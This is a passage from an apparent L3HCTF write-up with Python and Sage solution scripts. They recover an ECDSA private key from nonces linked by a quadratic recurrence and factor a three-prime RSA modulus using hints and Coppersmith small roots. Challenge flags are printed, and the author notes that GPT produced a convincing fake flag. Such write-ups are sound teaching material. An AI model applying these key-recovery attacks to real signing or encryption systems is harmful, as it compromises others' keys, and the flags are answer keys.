    Y_num_2 = get_diff_poly(idx_offset + 3, idx_offset + 4)
    Y_den_0 = get_diff_poly(idx_offset, idx_offset + 1)
    Y_den_1 = get_diff_poly(idx_offset + 1, idx_offset + 2)
    Y_den_2 = get_diff_poly(idx_offset + 2, idx_offset + 3)

    num_Y0_minus_Y1 = poly_sub(poly_mul(Y_num_0, Y_den_1, n), poly_mul(Y_num_1, Y_den_0, n), n)
    den_Y0_minus_Y1 = poly_mul(Y_den_0, Y_den_1, n)
    num_Y1_minus_Y2 = poly_sub(poly_mul(Y_num_1, Y_den_2, n), poly_mul(Y_num_2, Y_den_1, n), n)
    den_Y1_minus_Y2 = poly_mul(Y_den_1, Y_den_2, n)

    X1_minus_X3 = get_diff_poly(idx_offset + 1, idx_offset + 3)
    X0_minus_X2 = get_diff_poly(idx_offset, idx_offset + 2)

    # (Y0 - Y1)(k1 - k3) = (Y1 - Y2)(k0 - k2), with denominators cleared
    lhs_num_expr = poly_mul(num_Y0_minus_Y1, X1_minus_X3, n)
    lhs_den_expr = den_Y0_minus_Y1
    rhs_num_expr = poly_mul(num_Y1_minus_Y2, X0_minus_X2, n)
    rhs_den_expr = den_Y1_minus_Y2

    final_poly_lhs_term = poly_mul(lhs_num_expr, rhs_den_expr, n)
    final_poly_rhs_term = poly_mul(rhs_num_expr, lhs_den_expr, n)
    result_poly = poly_sub(final_poly_lhs_term, final_poly_rhs_term, n)
    return result_poly
```



```python
P_d_coeffs = calculate_poly_for_d(0)
print(f"n = {n}")
print("P_d_coeffs = [")
for i, coeff in enumerate(P_d_coeffs):
    print(f"    {coeff},")
print("]")

print("\n# Copy 'n' and 'P_d_coeffs' above into a SageMath shell, then run:")
print("""
R.<x> = Zmod(n)[]
poly = sum(coeff * x^i for i, coeff in enumerate(P_d_coeffs))
print(poly.roots())
""")
```

The second root is the correct one, giving L3HCTF{46003571009791459373376302598944888076887350506059398976372956237301255231719}
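Which root is right can be checked with the sixth signature, which the polynomial does not use. A minimal sketch, assuming (inferred from the elimination polynomial, not stated in the writeup) that nonces follow $k_{i+1} = a k_i^2 + b k_i + c \pmod n$. The function names and toy parameters are hypothetical, and the synthetic signatures involve no real curve arithmetic, only the linear relation $k = s^{-1}(h + r d)$:

```python
def recover_nonces(sigs, d, n):
    """k_i = s_i^{-1} (h_i + r_i d) mod n for each (h, r, s)."""
    return [(h + r * d) * pow(s, -1, n) % n for h, r, s in sigs]


def fits_quadratic_recurrence(ks, n):
    """Fit a, b, c from k_0..k_3, then check every consecutive pair."""
    def inv(x):
        return pow(x % n, -1, n)
    y0 = (ks[1] - ks[2]) * inv(ks[0] - ks[1]) % n
    y1 = (ks[2] - ks[3]) * inv(ks[1] - ks[2]) % n
    a = (y0 - y1) * inv(ks[0] - ks[2]) % n
    b = (y0 - a * (ks[0] + ks[1])) % n
    c = (ks[1] - a * ks[0] ** 2 - b * ks[0]) % n
    return all((a * k * k + b * k + c - nxt) % n == 0 for k, nxt in zip(ks, ks[1:]))


def make_synthetic_sigs(n, d, a, b, c, k0, count=6):
    """Fake (h, r, s) triples whose nonces follow the recurrence (toy data)."""
    ks = [k0]
    for _ in range(count - 1):
        ks.append((a * ks[-1] ** 2 + b * ks[-1] + c) % n)
    sigs = []
    for i, k in enumerate(ks):
        h = (1000 + 7 * i) % n
        r = (31337 + 13 * i) % n
        s = (h + r * d) * pow(k, -1, n) % n
        sigs.append((h, r, s))
    return sigs, ks


if __name__ == "__main__":
    n = 2**127 - 1  # a prime modulus, for the toy example only
    d = 123456789
    sigs, ks = make_synthetic_sigs(n, d, a=3, b=5, c=7, k0=11)
    print(recover_nonces(sigs, d, n) == ks)
    print(fits_quadratic_recurrence(recover_nonces(sigs, d, n), n))
    print(fits_quadratic_recurrence(recover_nonces(sigs, d + 1, n), n))
```

For the challenge, one would pass the six parsed `(h, r, s)` triples with `n = NIST256p.order` and try each root Sage reports; under the recurrence assumption, the real key is the one for which all six nonces fit.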

Colab is an online Python environment.

SageCell is an online SageMath environment.

Both are super convenient.

math_problem

I gave it to GPT, which came up with {C0pp3rSm1th_L0w_B1ts_4nd_H1nt2_3xp4ns10n_Ar3_Fun_r1ght?}

which I thought looked very convincing.

It was a fake. Here is the real exp:

```sage
# sage
from Crypto.Util.number import *

n = 1031361339208727791691298627543660626410606240120564103678654539403400080866317968868129842196968695881908504164493307869679126969820723174066217814377008485456923379924853652121682069359767219423414060835725846413022799109637665041081215491777412523849107017649039242068964400703052356256244423474207673552341406331476528847104738461329766566162770505123490007005634713729116037657261941371410447717090137275138353217951485412890440960756321099770208574858093921
c = 102236458296005878146044806702966879940747405722298512433320216536239393890381990624291341014929382445849345903174490221598574856359809965659167404530660264493014761156245994411400111564065685663103513911577275735398329066710295262831185375333970116921093419001584290401132157702732101670324984662104398372071827999099732380917953008348751083912048254277463410132465011554297806390512318512896160903564287060978724650580695287391837481366347198300815022619675984
hint1 = 41699797470148528118065605288197366862071963783170462567646805693192170424753713903885385414542846725515351517470807154959539734665451498128021839987009088359453952505767502787767811244460427708303466073939179073677508236152266192609771866449943129677399293427414429298810647511172104050713783858789512441818844085646242722591714271359623474775510189704720357600842458800685062043578453094042903696357669390327924676743287819794284636630926065882392099206000580093201362555407712118431477329843371699667742798025599077898845333
hint2 = 10565371682545827068628214330168936678432017129758459192768614958768416450293677581352009816968059122180962364167183380897064080110800683719854438826424680653506645748730410281261164772551926020079613841220031841169753076600288062149920421974462095373140575810644453412962829711044354434460214948130078789634468559296648856777594230611436313326135647906667484971720387096683685835063221395189609633921668472719627163647225857737284122295085955645299384331967103814148801560724293703790396208078532008033853743619829338796313296528242521122038216263850878753284443416054923259279068894310509509537975210875344702115518307484576582043341455081343814378133782821979252975223992920160189207341869819491668768770230707076868854748648405256689895041414944466320313193195829115278252603228975429163616907186455903997049788262936239949070310119041141829846270634673190618136793047062531806082102640644325030011059428082270352824026797462398349982925951981419189268790800571889709446027925165953065407940787203142846496246938799390975110032101769845148364390897424165932568423505644878118670783346937251004620653142783361686327652304482423795489977844150385264586056799848907

r = GCD(n, hint1)
pl = (hint2 % (n^2) - 1) // (3 * n)
R.<x> = Zmod(n//r)[]
f = x * 2^400 + pl
f = f.monic()
ph = f.small_roots(X=2^112, beta=0.4)[0]
p = ZZ(ph * 2^400 + pl)
q = n // (p * r)
phi = (p - 1) * (q - 1) * (r - 1)
d = inverse(65537, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
```

Flag: L3HCTF{1s_4h1s_r3a11y_m4th?}

Run it on CoCalc.
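The line `pl = (hint2 % (n^2) - 1) // (3 * n)` relies on the binomial theorem: $(1+n)^m = 1 + mn + \binom{m}{2}n^2 + \dots \equiv 1 + mn \pmod{n^2}$. The challenge source is not shown here, so the exact form of `hint2` is an assumption; the toy below uses $(1+n)^{3 p_l} \bmod n^2$, one form for which the exp's formula works as long as $3 p_l < n$. (Similarly, `GCD(n, hint1)` works only because `hint1` shares the factor `r` with `n`.) The numbers are tiny stand-ins and `recover_from_binomial_hint` is a hypothetical helper.

```python
def recover_from_binomial_hint(hint, n, k=3):
    """Recover m from hint ≡ 1 + k*m*n (mod n^2); valid while k*m < n."""
    return (hint % (n * n) - 1) // (k * n)


if __name__ == "__main__":
    # Toy numbers only; the real challenge values are far larger.
    n = 1000003 * 1000033 * 1000037
    p_low = 12345
    # All terms after 1 + m*n in the binomial expansion are multiples of n^2.
    hint = pow(1 + n, 3 * p_low, n * n)
    print(hint == 1 + 3 * p_low * n)
    print(recover_from_binomial_hint(hint, n))
```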